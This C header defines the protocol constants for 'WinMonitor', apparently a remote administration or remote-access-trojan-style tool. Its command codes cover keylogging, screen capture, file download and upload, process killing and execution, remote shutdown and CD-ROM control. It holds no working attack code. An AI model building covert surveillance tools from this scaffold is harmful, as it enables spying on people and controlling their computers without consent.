
#include<WINDOWS.H>

//-----------------WinMonitor Main Types------------------------//

#define WIN_MONITOR_NULL_COMMAND                   0x00
#define WIN_MONITOR_KEEP_ALIVE                     0x01
#define WIN_MONITOR_SHUTDOWN_CONNECTION            0x02
#define WIN_MONITOR_GET_PWD                        0x03
#define WIN_MONITOR_GOT_PWD                        0x04
#define WIN_MONITOR_PWD_OK                         0x05
#define WIN_MONITOR_COMMAND_MONITOR                0x06
#define WIN_MONITOR_SCREEN_MONITOR                 0x07

#define WIN_MONITOR_CHAT_CLIENTSERVER              0x08 
#define WIN_MONITOR_NORMAL_CLIENTSERVER            0x09 
#define WIN_MONITOR_CLIENT_ACCEPTED                0x0A
#define WIN_MONITOR_GET_CLIENTTYPE                 0x0B
#define WIN_MONITOR_KEYLOG_CLIENTSERVER            0x0C 

//----------------Command Monitor Client/Server----------------//

#define COMMAND_MONITOR_NULL_COMMAND          0x00000000
#define COMMAND_MONITOR_GET_LOGICAL_DRIVES    0x00000010
#define COMMAND_MONITOR_GET_SUB_DIRS          0x00000020
#define COMMAND_MONITOR_GET_DRIVE_TYPE        0x00000030
#define COMMAND_MONITOR_GET_DRIVE_INFO        0x00000040
#define COMMAND_MONITOR_GET_FILE_ASEXE        0x00000050
#define COMMAND_MONITOR_DOWNLOAD_FILE         0x00000060
#define COMMAND_MONITOR_DISPLAY_MSG           0x00000070
#define COMMAND_MONITOR_SET_COMPRESSION       0x00000080

#define COMMAND_MONITOR_GOT_LOGICAL_DRIVES    0x00000090
#define COMMAND_MONITOR_GOT_SUB_DIRS          0x000000A0
#define COMMAND_MONITOR_GOT_DRIVE_TYPE        0x000000B0
#define COMMAND_MONITOR_GOT_DRIVE_INFO        0x000000C0
#define COMMAND_MONITOR_GOT_FILE_ASEXE        0x000000D0
#define COMMAND_MONITOR_DOWNLOADED_FILE       0x000000E0
#define COMMAND_MONITOR_DISPLAYED_MSG         0x000000F0
#define COMMAND_MONITOR_SET_COMPRESSION_OK    0x00000100

//----------------Additional Commands-----------------//

#define COMMAND_MONITOR_GET_WINSERVER_NAME    0x00000110
#define COMMAND_MONITOR_GOT_WINSERVER_NAME    0x00000120
#define COMMAND_MONITOR_GET_MAIN_MEMORY       0x00000130
#define COMMAND_MONITOR_GOT_MAIN_MEMORY       0x00000140
#define COMMAND_MONITOR_GET_COMPUSER_NAME     0x00000150
#define COMMAND_MONITOR_GOT_COMPUSER_NAME     0x00000160
#define COMMAND_MONITOR_GET_OS_VERSION        0x00000170
#define COMMAND_MONITOR_GOT_OS_VERSION        0x00000180
#define COMMAND_MONITOR_GET_SUB_DIR_NAMES     0x00000190
#define COMMAND_MONITOR_GOT_SUB_DIR_NAMES     0x000001A0
#define COMMAND_MONITOR_GET_PROCESSLIST       0x000001B0
#define COMMAND_MONITOR_GOT_PROCESSLIST       0x000001C0

#define COMMAND_MONITOR_KILL_PROCESS          0x000001D0
#define COMMAND_MONITOR_KILLED_PROCESS        0x000001E0
#define COMMAND_MONITOR_EXEC_PROGRAM          0x000001F0
#define COMMAND_MONITOR_EXECD_PROGRAM         0x00000200
#define COMMAND_MONITOR_SET_PROC_PRIORITY     0x00000210
#define COMMAND_MONITOR_SET_PROC_PRIORITY_OK  0x00000220
#define COMMAND_MONITOR_LOGOFF                0x00000230
#define COMMAND_MONITOR_LOGOFF_OK             0x00000240
#define COMMAND_MONITOR_SHUTDOWN              0x00000250
#define COMMAND_MONITOR_SHUTDOWN_OK           0x00000260
#define COMMAND_MONITOR_POWER_OFF             0x00000270
#define COMMAND_MONITOR_POWER_OFF_OK          0x00000280
#define COMMAND_MONITOR_RESTART               0x00000290
#define COMMAND_MONITOR_RESTART_OK            0x000002A0
#define COMMAND_MONITOR_DELETE_FILE           0x000002B0
#define COMMAND_MONITOR_DELETE_FILE_OK        0x000002C0
#define COMMAND_MONITOR_CREATE_FOLDER         0x000002D0
#define COMMAND_MONITOR_CREATE_FOLDER_OK      0x000002E0
#define COMMAND_MONITOR_UPLOADED_FILE         0x000002F0
#define COMMAND_MONITOR_FILE_UPLOADED         0x00000300
#define COMMAND_MONITOR_LISTEN_PORT			  0x00000310	


#define COMMAND_MONITOR_INSTALL_KEYBOARD_FUN_PLUGIN       0x00000320
#define COMMAND_MONITOR_INSTALLED_KEYBOARD_FUN_PLUGIN     0x00000330
#define COMMAND_MONITOR_UNINSTALL_KEYBOARD_FUN_PLUGIN     0x00000340
#define COMMAND_MONITOR_UNINSTALLED_KEYBOARD_FUN_PLUGIN   0x00000350
#define COMMAND_MONITOR_OPEN_CDROM       0x00000360
#define COMMAND_MONITOR_OPENED_CDROM     0x00000370 
#define COMMAND_MONITOR_CLOSE_CDROM      0x00000380
#define COMMAND_MONITOR_CLOSED_CDROM     0x00000390

//---------------------------------------------------//

#define COMMAND_MONITOR_COMPRESS_NIL          0x00000000
#define COMMAND_MONITOR_COMPRESS_LZSS         0x00000001

#define COMMAND_MONITOR_GetType(uint32Header)                ((uint32Header) & 0xFFFFFFF0) 
#define COMMAND_MONITOR_GetCompression(uint32Header)         ((uint32Header) & 0x0000000F) 
#define COMMAND_MONITOR_SetType(Choice,uint32Header)          uint32Header=(((uint32Header) | 0xFFFFFFF0)& ((Choice) | 0x0000000F))  
#define COMMAND_MONITOR_SetCompression(Choice,uint32Header)   uint32Header=(((uint32Header) | 0x0000000F)& ((Choice) | 0xFFFFFFF0))  


#define COMMAND_MONITOR_MSG_INFO    0x01
#define COMMAND_MONITOR_MSG_STOP    0x02
#define COMMAND_MONITOR_MSG_QSTN    0x03
#define COMMAND_MONITOR_MSG_EXCL    0x04

#define COMMAND_MONITOR_DRIVE_UNKNOWN         0x00
#define COMMAND_MONITOR_DRIVE_NOROOT          0x01
#define COMMAND_MONITOR_DRIVE_REMOVABLE       0x02
#define COMMAND_MONITOR_DRIVE_FIXED			  0x03
#define COMMAND_MONITOR_DRIVE_CDROM           0x04
#define COMMAND_MONITOR_DRIVE_RAMDISK         0x05
#define COMMAND_MONITOR_DRIVE_REMOTE          0x06

#define COMMAND_MONITOR_EXE_UNKNOWN           0x00
#define COMMAND_MONITOR_EXE_32BIT_BINARY      0x01
#define COMMAND_MONITOR_EXE_64BIT_BINARY      0x02	
#define COMMAND_MONITOR_EXE_DOS_BINARY        0x03  
#define COMMAND_MONITOR_EXE_OS216_BINARY      0x04  
#define COMMAND_MONITOR_EXE_PIF_BINARY        0x05
#define COMMAND_MONITOR_EXE_POSIX_BINARY      0x06
#define COMMAND_MONITOR_EXE_WOW_BINARY        0x07

#define COMMAND_MONITOR_PROCESS_PRIORITY_NO_CHANGE           0x00
#define COMMAND_MONITOR_PROCESS_PRIORITY_ABOVE_NORMAL        0x01 
#define COMMAND_MONITOR_PROCESS_PRIORITY_BELOW_NORMAL        0x02 
#define COMMAND_MONITOR_PROCESS_PRIORITY_HIGH_PRIORITY       0x03
#define COMMAND_MONITOR_PROCESS_PRIORITY_IDLE_PRIORITY       0x04
#define COMMAND_MONITOR_PROCESS_PRIORITY_NORMAL_PRIORITY     0x05
#define COMMAND_MONITOR_PROCESS_PRIORITY_REALTIME_PRIORITY   0x06

#define COMMAND_MONITOR_SYSTEM_DOWN_NORMAL    0x00
#define COMMAND_MONITOR_SYSTEM_DOWN_IMMEDIATE 0x01


//-------------Screen Monitor Types & Comprn-------//

#define SCREEN_MONITOR_TYPE_UNDEF             0x00
#define SCREEN_MONITOR_TYPE_DIBITMAP          0x10
#define SCREEN_MONITOR_TYPE_DIBITMAPFILE      0x20

#define SCREEN_MONITOR_COMPRESS_NIL      0x00
#define SCREEN_MONITOR_COMPRESS_LZSS     0x01

//-------------Screen Monitor Messages-------//

#define SCREEN_MONITOR_TYPE_TAKE_DESKTOP      0x30
#define SCREEN_MONITOR_TYPE_TAKE_WINDOW       0x40
#define SCREEN_MONITOR_TYPE_SET_COMPRESSION   0x50

//-------------------------------------------//
										

#define SCREEN_MONITOR_GETCOMPRESSION(Byte)            ((Byte) & 0x0F)
#define SCREEN_MONITOR_GETTYPE(Byte)                   ((Byte) & 0xF0)
#define SCREEN_MONITOR_SETCOMPRESSION(Choice,Byte)     (((Byte)| 0x0F) & ((Choice)|0xF0) )
#define SCREEN_MONITOR_SETTYPE(Choice,Byte)            (((Byte)| 0xF0) & ((Choice) | 0x0F))


//----------------File Monitor----------------//

#define CFileMonitor_FILENAME_ONLY      1
#define CFileMonitor_FILENAME_AND_SIZE  2
#define CFileMonitor_FILEINFO_DETAILED  3

#define CFileMonitor_FILETYPE_UNDEF        0
#define CFileMonitor_FILETYPE_DIR          1
#define CFileMonitor_FILETYPE_NORMAL       2
#define CFileMonitor_FILETYPE_HIDDEN       3
#define CFileMonitor_FILETYPE_TEMP         4
#define CFileMonitor_FILETYPE_ARCHIVE      5
#define CFileMonitor_FILETYPE_ENCRYPT      6
#define CFileMonitor_FILETYPE_SYSTEM       7
#define CFileMonitor_FILETYPE_READONLY     8
#define CFileMonitor_FILETYPE_OFFLINE      9
#define CFileMonitor_FILETYPE_COMPRESSED   10